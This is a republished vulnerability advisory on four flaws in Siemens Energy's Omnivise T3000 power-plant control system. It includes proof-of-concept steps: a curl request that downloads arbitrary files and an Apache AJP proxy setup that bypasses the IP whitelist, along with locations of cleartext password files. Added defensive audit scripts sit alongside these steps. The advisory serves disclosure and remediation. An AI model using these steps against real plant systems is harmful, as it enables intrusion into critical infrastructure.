Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download Vulnerabilities

Published: 14 Nov 2024 00:00:00 | Reported by: Andreas Kolbeck | Type: zdt | Source: 0day.today | 588 views

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download Vulnerabilities. Multiple vulnerabilities found by SEC Consult Vulnerability Lab. Business recommendation: perform a security review and follow the mitigation instructions in security advisory SSA-857368, Omnivise T3000 Technical News 2024-089, and SE Controls Security Announcement 2024-01.

=======================================================================
              title: Multiple vulnerabilities
            product: Siemens Energy Omnivise T3000
 vulnerable version: >=8.2 SP3
      fixed version: see solution section
         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879
             impact: High
           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html
              found: 2024-06-02
                 by: Steffen Robertz (Office Vienna)
                     Andreas Kolbeck (Office Munich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Located in 90 countries, Siemens Energy operates across the whole energy landscape.
From conventional to renewable power, from grid technology to storage to electrifying
complex industrial processes.

Our mission is to support companies and countries with what they need to reduce
greenhouse gas emissions and make energy reliable, affordable, and more sustainable.
Let’s energize society."

Source: https://www.siemens-energy.com/global/en/home/company/about.html


Business recommendation:
------------------------
Siemens has released their security advisory SSA-857368, see the following URL
for further details:
https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-section

Follow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089
and SE Controls Security Announcement 2024-01.

SEC Consult highly recommends performing a thorough security review of the product,
conducted by security professionals, to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)
Insecurely configured services, or insecure permissions on their binaries, lead to
privilege escalation vulnerabilities on the Windows operating system. A low-privileged
user can modify the service binary so that arbitrary code is executed instead of the
actual service. The service path is writable by the "Authenticated Users" group.
Precondition for exploitation: requires authenticated local access to the Terminal Server
of the T3000 system.

2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)
Multiple files containing cleartext passwords were discovered. These can be used
to jump from host to host and thus compromise the whole security architecture of
the T3000 system.
Precondition for exploitation: requires administrative local access to any server of the
T3000 system.

3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)
The RemoteDiagnosticView application is a web application hosted on the application
server. One parameter accepts a full path, which can be abused to download arbitrary
files.
Precondition for exploitation: requires administrative remote access to the Application
server of the T3000 system.

4) IP Whitelist Bypass (CVE-2024-38879)
The application server hosts the T3000 web application on port 8080. However,
only the Terminal Server is whitelisted. This whitelisting can be circumvented by
exploiting the additionally exposed Tomcat AJP service on port 8009.
Precondition for exploitation: requires unauthenticated remote access to the Application
server of the T3000 system.


Proof of concept:
-----------------
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)
The following path hosts a file that is used by the "DSGW Service" of the T3000 system:

"E:\dsgw\gw\bin\dsgwservice.exe"

The path is writable by the "Authenticated Users" group.
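A defender-side check for this misconfiguration, added here as an example and not part of the advisory: it parses what `icacls` prints for a service binary path and reports the low-privilege groups that hold write rights on it. The sample output is constructed in the shape of the advisory's finding; `LOW_PRIV_GROUPS` and the rights table use the standard icacls names.

```python
import re
import subprocess
import sys

# Groups every authenticated or interactive user is a member of; write access for
# them on a service binary is the misconfiguration behind CVE-2024-38876.
LOW_PRIV_GROUPS = {"NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users",
                   "Everyone", "NT AUTHORITY\\INTERACTIVE"}
# icacls rights that let a user replace or alter the file (full, modify, generic
# write, write/append data, delete, write DAC, write owner).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}

# Constructed icacls output modelled on the advisory's finding (not captured from
# a real system): the service binary is modifiable by Authenticated Users.
SAMPLE_ICACLS = r"""E:\dsgw\gw\bin\dsgwservice.exe NT AUTHORITY\Authenticated Users:(I)(M)
                               BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

def writable_by_low_priv(icacls_output: str, path: str) -> list[str]:
    """Return the low-privilege principals that can modify `path`, given the text
    that `icacls <path>` printed. Deny entries are skipped: a deny can only narrow
    access, so skipping it errs towards reporting."""
    offenders = []
    for raw in icacls_output.splitlines():
        line = raw.strip()
        if line.startswith(path):            # only the first line carries the path
            line = line[len(path):].strip()
        if ":(" not in line or "(DENY)" in line:
            continue                          # blank / summary lines, deny entries
        who, _, aces = line.rpartition(":")   # principal names never contain ':'
        # Rights are the last parenthesised group; "(RX,W)" style groups are comma-joined
        rights = set(re.findall(r"\(([^()]*)\)", aces)[-1].split(","))
        if who in LOW_PRIV_GROUPS and rights & WRITE_RIGHTS:
            offenders.append(who)
    return offenders

if __name__ == "__main__":
    if len(sys.argv) > 1:                    # audit a real binary path on Windows
        target = sys.argv[1]
        out = subprocess.run(["icacls", target], capture_output=True, text=True).stdout
    else:                                    # offline demo on the constructed sample
        target, out = r"E:\dsgw\gw\bin\dsgwservice.exe", SAMPLE_ICACLS
    print(writable_by_low_priv(out, target) or "no low-privilege write access found")
```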


2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)
Multiple files containing cleartext passwords were discovered.

Terminal Server:
* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)
* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)
* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)


Application Server:
* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of the Tomcat and MySQL services)
* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for the MySQL service and installation)

All Servers:
All servers are deployed via Puppet. However, the Puppet cache file is never
cleared and still contains the initial passwords of all systems of the T3000 system:

"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"

---------------------------------------
[...]
"parameters": {
"foreman_pass": "[redacted]",
"foreman_url": "[redacted]",
"foreman_user": "puppet_provider",
"is_sec": "true",
"mpssvc_pass": "[redacted]"
}
[...]
"parameters": {
"crsphost": "XXX.XXX.XXX.XXX",
"crsppswd": "",
"crsprepo": "AVPatterns",
"crspservice": "SFTP",
"crspuser": "siem_t3000_west",
"primary_ts": true
}
[...]
"parameters": {
[...]
"snmpv3_authpass": "[redacted]",
"snmpv3_privpass": "[redacted]",
"snmpv3_user": "snmpuser",
"snmpv3_hash": "SHA",
"snmpv3_encrypt": "AES"
}
[...]
"parameters": {
[...]
"cyg_server_passwd": "[redacted]",
[...]
"fst_appsrv_passwd": "",
"fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",
[...]
"icmauser_passwd": "[redacted]",
[...]
"opcadmin_passwd": "[redacted]",
"operator01_passwd": "[redacted]",
"operator02_passwd": "[redacted]",
"operator03_passwd": "[redacted]",
"operator04_passwd": "[redacted]",
"operator05_passwd": "[redacted]",
"operator06_passwd": "[redacted]",
"operator07_passwd": "[redacted]",
"operator08_passwd": "[redacted]",
"operator09_passwd": "[redacted]",
"operator10_passwd": "[redacted]",
"operators_password": "[redacted]",
"pdm01_passwd": "[redacted]",
"pdm02_passwd": "[redacted]",
"pdm03_passwd": "[redacted]",
"pdm04_passwd": "[redacted]",
"pdm05_passwd": "[redacted]",
"pdm06_passwd": "[redacted]",
"pdm07_passwd": "[redacted]",
"pdm08_passwd": "[redacted]",
"pdm09_passwd": "[redacted]",
"pdm10_passwd": "[redacted]",
"pmas_passwd": "[redacted]",
"pmsvc_passwd": "[redacted]",
"pmts_passwd": "[redacted]",
"reparchive_passwd": "[redacted]",
[...]
"t3kservice_passwd": "[redacted]",
[...]
"tomcatadmin_passwd": "[redacted]",
"tsuser01_passwd": "[redacted]",
"tsuser02_passwd": "[redacted]",
"tsuser03_passwd": "[redacted]",
"tsuser04_passwd": "[redacted]",
"tsuser05_passwd": "[redacted]",
"tsuser06_passwd": "[redacted]",
"tsuser07_passwd": "[redacted]",
"tsuser08_passwd": "[redacted]",
"tsuser09_passwd": "[redacted]",
"tsuser10_passwd": "[redacted]",
"txpdomain_passwd": "[redacted]",
[...]
"vm_r8_passwd": "[redacted]",
[...]
"vm_tc_passwd": "[redacted]",
[...]
"vm_ts_passwd": "[redacted]",
[...]
"vm_whitelist_hostname": "",
"vm_whitelist_passwd": "",
"wbuser01_passwd": "[redacted]",
"wbuser02_passwd": "[redacted]",
"wbuser03_passwd": "[redacted]",
"wbuser04_passwd": "[redacted]",
"wbuser05_passwd": "[redacted]",
"wbuser06_passwd": "[redacted]",
"wbuser07_passwd": "[redacted]",
"wbuser08_passwd": "[redacted]",
"wbuser09_passwd": "[redacted]",
"wbuser10_passwd": "[redacted]",
"wra01_passwd": "[redacted]",
[...]
"dsrm_passwd": "[redacted]",
[...]
"dc_passwd": "[redacted]",
[...]
"patchsvc_passwd": "[redacted]",
}
--------------------------------------------------

To understand the impact of this file, we have to explain a little about the T3000 system.
The system is split into three levels: Operator, Automation and Process.

Operator Level: This is the level where the thin clients are situated. In our test case,
this level consisted of the Terminal Server that engineers could connect to. From there,
they start the T3000 application, which simply loads a browser and displays a Java
application served from the Application Server.

Automation Level: This level consists of application and automation servers. The application
server hosts the non-time-critical components of power generation, such as the web server.
The automation servers take care of the time-critical operations. In our test case these
were PLCs from the SIMATIC S7-CPU family.

Process Level: This level consists of the I/O modules that are controlled by the automation
servers.

The Terminal Server, located on the operator level, already contained the Puppet cache file,
which held the passwords of all the local Windows users used in the T3000 system in clear text.
As the Terminal Server communicates with the Application Server, the two have to be connected
via the network. Thus, the attacker can use the credentials found on the Terminal Server to jump
to the Application Server. This server is in the same network segment as the physical PLC CPUs.
Thus an attacker can now also control the PLCs and thus the whole power plant.

In order to read the Puppet cache file, an attacker has to gain local admin rights first.
For this, vulnerability 1 can be used.
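Covering both the overview in 2) and the Puppet cache finding above, here is an added example (not the advisory's or Siemens' code) that walks a catalog JSON file and lists every credential-looking key under a `parameters` object, reporting only whether it is set and never the value. The resource layout and the sample contents are constructed from the shape of the excerpt; pointing it at the cached `catalog` file shows what was left behind after provisioning.

```python
import json
import re
import sys
from typing import Iterator

# Parameter names that carry credentials in the cached catalog; the pattern is kept
# broad on purpose (pass, passwd, password, pswd, secret, token).
SECRET_KEY_RE = re.compile(r"pass(wd|word)?|pswd|secret|token", re.IGNORECASE)

def find_secret_parameters(node, path: str = "$") -> Iterator[tuple[str, str, bool]]:
    """Walk any catalog JSON structure and yield (json_path, key, is_set) for each
    credential-looking key inside a "parameters" object. The value itself is never
    yielded, so the report cannot leak what it found."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "parameters" and isinstance(value, dict):
                for pname, pval in value.items():
                    if SECRET_KEY_RE.search(pname):
                        yield child, pname, pval not in ("", None)
            else:
                yield from find_secret_parameters(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_secret_parameters(item, f"{path}[{i}]")

def audit_catalog(text: str) -> list[str]:
    """One line per credential-looking parameter; the SET ones are the real exposure."""
    return [f"{where}.{key}: {'SET' if is_set else 'empty'}"
            for where, key, is_set in find_secret_parameters(json.loads(text))]

# Constructed sample in the shape of the advisory's excerpt; values are placeholders,
# and the resource layout (resources -> parameters) is assumed.
SAMPLE_CATALOG = json.dumps({"resources": [
    {"type": "Class", "title": "foreman", "parameters": {
        "foreman_pass": "PLACEHOLDER", "foreman_user": "puppet_provider", "is_sec": "true"}},
    {"type": "Class", "title": "crsp", "parameters": {
        "crsphost": "192.0.2.10", "crsppswd": "", "crspuser": "siem_t3000_west"}},
    {"type": "Class", "title": "snmp", "parameters": {
        "snmpv3_authpass": "PLACEHOLDER", "snmpv3_user": "snmpuser", "snmpv3_hash": "SHA"}},
]})

if __name__ == "__main__":
    # Usage: audit_catalog.py <catalog.json>; without an argument the sample is audited.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CATALOG
    print("\n".join(audit_catalog(text)))
```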


3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)
The RemoteDiagnosticView website is hosted at the following URL:

http://<IP Application Server>:8080/RemoteDiagnosticView

In our test case it was configured with default credentials: the following username and
an easy-to-guess password:

txpadmin:[redacted]

Using these credentials an attacker gains an authenticated session. From there, one can
simply download arbitrary files:

------------------------
curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -i \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -X POST -d "filename=D:\sectest.txt&type=TEXT" \
     http://$host:8080/RemoteDiagnosticView/DataServlet


HTTP/1.1 200
Content-Type: text/plain
Transfer-Encoding: chunked
[...]

Sectest
---------------------------------
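The server-side check that the DataServlet lacks, shown in Python as an added illustration rather than the servlet's own (Java) code: the `filename` parameter is confined to an assumed base directory, so a full path like the one in the PoC is refused. `ALLOWED_BASE` is an assumption, and `PureWindowsPath` applies Windows path semantics regardless of where the check runs.

```python
from pathlib import PureWindowsPath

# Directory the diagnostic download is meant to serve from (assumed; the advisory
# does not say where RemoteDiagnosticView's legitimate files live).
ALLOWED_BASE = PureWindowsPath(r"D:\SPPA-T3000\diagnostics")

def unsafe_resolve(filename: str) -> PureWindowsPath:
    """What the advisory describes: the parameter is taken as a full path."""
    return PureWindowsPath(filename)          # "D:\sectest.txt" is served as-is

def resolve_download(filename: str, base: PureWindowsPath = ALLOWED_BASE) -> PureWindowsPath:
    r"""Hardened mapping of a user-supplied name to a path inside `base`.
    Rejects absolute paths (D:\x, \x), drive-relative paths (D:x), UNC paths
    (\\host\share), '.'/'..' components and NUL bytes; raises ValueError for each."""
    if not filename or "\x00" in filename:
        raise ValueError("empty or NUL-containing filename")
    requested = PureWindowsPath(filename)     # also normalises '/' to '\'
    if requested.drive or requested.root:
        raise ValueError(f"absolute, drive or UNC path rejected: {filename!r}")
    if any(part in (".", "..") for part in requested.parts):
        raise ValueError(f"traversal component rejected: {filename!r}")
    candidate = base.joinpath(*requested.parts)
    if base not in candidate.parents:         # belt and braces: must stay under base
        raise ValueError(f"escapes base directory: {filename!r}")
    return candidate

def is_rejected(filename: str) -> bool:
    """True when the hardened resolver refuses `filename`."""
    try:
        resolve_download(filename)
    except ValueError:
        return True
    return False
```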


4) IP Whitelist Bypass (CVE-2024-38879)
The AJP protocol can be used to proxy requests from an Apache server to an application
running on Tomcat. By setting up a local Apache server and configuring it to use the
AJP service of the Application Server, the IP filter is circumvented.
The following setup was built:

------------------------------
sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/apache2.conf
# append the following line to the config
    Include ajp.conf
sudo vim /etc/apache2/ajp.conf
# create the following file
    ProxyRequests Off
    <Proxy *>
        Order deny,allow
        Deny from all
        Allow from localhost
    </Proxy>
    ProxyPass          / ajp://<Application Server IP>:8009/
    ProxyPassReverse   / ajp://<Application Server IP>:8009/
sudo a2enmod proxy_http
sudo a2enmod proxy_ajp
sudo systemctl restart apache2
--------------------------
Afterwards, e.g. the RemoteDiagnosticView application can be loaded from http://127.0.0.1/RemoteDiagnosticView
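An added audit of the Tomcat side of this finding, not part of the advisory: an IP whitelist on the HTTP connector does nothing for an AJP connector that listens on every interface, so this script reads a `server.xml` and flags AJP connectors that are not bound to loopback or do not require the shared secret. Both `server.xml` samples are constructed; the `secretRequired`/`secret` attributes and the loopback default exist from Tomcat 8.5.51/9.0.31 onwards.

```python
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_ajp_connectors(server_xml: str) -> list[str]:
    """Return one finding per AJP connector in a Tomcat server.xml that is reachable
    from the network or accepts AJP requests without the shared secret."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in conn.get("protocol", "").upper():
            continue
        port = conn.get("port", "?")
        address = conn.get("address")   # before 9.0.31 the default was all interfaces
        if address is None or address not in LOOPBACK:
            findings.append(f"AJP connector on port {port} binds to {address or 'all interfaces'}")
        # secretRequired defaults to true on current releases; an explicit opt-out or a
        # connector without a configured secret still lets any client talk AJP to it.
        if conn.get("secretRequired", "true").lower() == "false" or not conn.get("secret"):
            findings.append(f"AJP connector on port {port} does not require a shared secret")
    return findings

# Constructed samples (not the T3000 application server's real configuration).
WEAK_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" secretRequired="false"/>
</Service></Server>"""

HARDENED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="PLACEHOLDER-SECRET"/>
</Service></Server>"""

if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or "no AJP exposure found")
```

Where no reverse proxy legitimately speaks AJP to the application server, removing the connector altogether is the simpler fix.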


Vulnerable / tested versions:
-----------------------------
The following version was tested; it was the latest version available
at the time of the test:
* 8.2

According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),
the following versions and components are affected:

All T3000 Versions >= Release 8.2 SP3:
* Security Server
* Thin Clients
* Terminal Server
* Application Server
* Domain Controller
* PDM VM
* Whitelisting VM
* NIDS

Record data (14 Nov 2024, current): Vulners AI Score 7 (High risk) | CVSS 3.1: 7.5 - 9.8 | CVSS 4: 8.7 | EPSS: 0.11452